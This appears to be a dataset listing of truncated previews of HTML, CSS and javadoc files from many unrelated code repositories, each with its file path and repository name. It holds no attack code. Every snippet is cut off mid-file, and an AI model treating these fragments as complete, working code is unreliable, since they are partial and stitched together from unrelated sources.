<!DOCTYPE html> <html> <head> <title>Wicked Wicks</title> <link rel="stylesheet" type="text/css" href="main.css"> </head> <body> <header> <a href="index.html"><img class="header-logo" src="img/Candles.jpg"></a> <span id="header-name">Wicked Wicks Candles</span> <input type="search" id="search" placeholder=...
web/css/googlemap.css
jordannick/SymfonyTest
#coords1 { padding: 5px; font-weight: bold; } #presenter { opacity:0.7; filter:alpha(opacity=70); -ms-filter:”alpha(opacity=70)”; -moz-opacity:0.7; KHTMLOpacity: 0.7; MozOpacity: 0.7; -khtml-opacity:.70; } #buttonrow { position: absolute; top: 200px; left: 0px; widt...
_pages/calculator.html
qaisjp/inf1.hgs.club
--- title: Coursework Calculator layout: page --- <p> <!-- I deliberately avoid saying "to pass" because there might be other reqs to pass --> If you want to see how much you need in your exam to get 40% overall, first: <ul> <li>Select your course.</li> <li>Click <button onclick="alert('not...
plugins/bootstrap/css/bootstrap.css
ShannonWie/SheCanTech
/*! * Bootstrap v3.3.7 (http://getbootstrap.com) * Copyright 2011-2016 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */ /*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */ html { font-family: sans-serif; -ms-text-size-adjust: 100%; ...
UnrealPyEmbed/Development/Python/2015.08.07-Python2710-x64-Source-vs2015/Python27/Source/db-4.7.25.0/docs/ref/upgrade.4.1/log_register.html
mollstam/UnrealPy
<!--$Id: log_register.html 63573 2008-05-23 21:43:21Z trent.nelson $--> <!--Copyright (c) 1997,2008 Oracle. All rights reserved.--> <!--See the file LICENSE for redistribution information.--> <html> <head> <title>Berkeley DB Reference Guide: Release 4.1: DB_ENV-&gt;log_register</title> <meta name="description" content...
WP2/D2.5.2_Generation/Jeni/doc/jgoodies/jgoodies-looks-docs/api/com/jgoodies/looks/plastic/theme/class-use/SkyRed.html
ModelWriter/Deliverables
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_37) on Tue Jan 22 18:23:22 CET 2013 --> <TITLE> Uses of Class com.jgoodies.looks.plastic.theme.SkyRed (JGoodies Looks 2.5 API) </TITLE> <META NAME="...
net.sourceforge.metrics/doc/apidocs/net/sourceforge/metrics/calculators/class-use/InvalidSourceException.html
leonardobsjr/metrics3
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.4.2_08) on Thu Jun 30 07:47:19 EDT 2005 --> <TITLE> Uses of Class net.sourceforge.metrics.calculators.InvalidSourceException </TITLE> <LINK R...
webapps/habmin/chart.html
dikirilov/openhab_conf
<!DOCTYPE html> <html style="height:100%"> <head> <title>HABmin Charting</title> <script type="text/javascript" src="js/jquery.min.js"></script> <script type="text/javascript" src="js/highcharts.js"></script> <script type="text/javascript"> var HABminBaseURL = "/services/habmin"; var persistenceService = ""; var su...
content/files/33c6f1f8-f14b-4cb2-b6b9-88322ade3999.html
agrpriyal/CS454-SEO
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <link hreflang="en-us" rel="alternate" href="http://www.samsung.com/us/video/home-audio/WAM3500/ZA"> <link rel="icon" href="/us/favicon.ico" type="image/x-icon"> <link rel="shortcut icon" href="/us/favicon.ico" type="image/x-icon"> <link rel="stylesheet" type="text/cs...
document/fitSharp/Fit/ArrayFixtureErrors.html
deftom/fitsharp
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- fitSharp Copyright © Syterra Software Inc. All rights reserved. The use and distribution terms for this software are covered by the Common Public License 1.0 (http://opensource.org/licenses/cpl.php) which can be ...
wp-content/plugins/enlighter/views/themes/panic.css
arkev/UM-Virtual
.wpcustomEnlighterJS, .wpcustomEnlighterJSWrapper{ font-family: Monaco, Courier, monospace; } .wpcustomEnlighterJSTabPane .controls li{ background-color: #f2f2f2; } .wpcustomEnlighterJSTabPane .controls li:hover{ background-color: #e5e5e5; } .wpcustomEnlighterJSTabPane .controls .selected, .wpcustomEnlighterJSTa...
resources/public/css/states.css
simon-brooke/mw3
td.waste { background-color: gray; } td.water { background-color: blue; } td.pasture, td.grassland, td.meadow { background-color: lime; } td.crop { background-color: yellow; } td.camp, td.house, td.inn, td.market { background-color: gray; } td.ploughland { background-color: brown; } td.heath { background...
049/xwphelp2/fsys/fldr_5hotkeys.html
rousseaux/netlabs.xworkplace
<HTML> <HEAD> <TITLE> &xwp;: Auf Tastenkrzel reagieren </TITLE> </HEAD> <!-- changed V0.9.4: extracted this text from 090settings10fldr1.html --> <!-- V0.9.19: title changed --> <BODY> <B>"Auf Tastenkrzel reagieren"</B> erm”glicht das Benutzen von Tastenkrzeln in diesem Ordner. <P>Die Ž...
src/js/widgets/user_settings/templates/change_email.html
aholachek/bumblebee
<div class="panel panel-default s-form-container"> <legend class="panel-heading"> Change Email Address </legend> <form class="panel-body"> <div class="form-group"> <label class="control-label">Current email address:&nbsp;&nbsp; </label> <p class="form-control-static">{{user}}...
public/include/najax/docs/source/NAJAX/NAJAX_HTML/NAJAX_HTML_ServerObserver.html
uqlibrary/fez
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!-- template designed by Marco Von Ballmoos --> <title>Docs For Class NAJAX_HTML_Serve...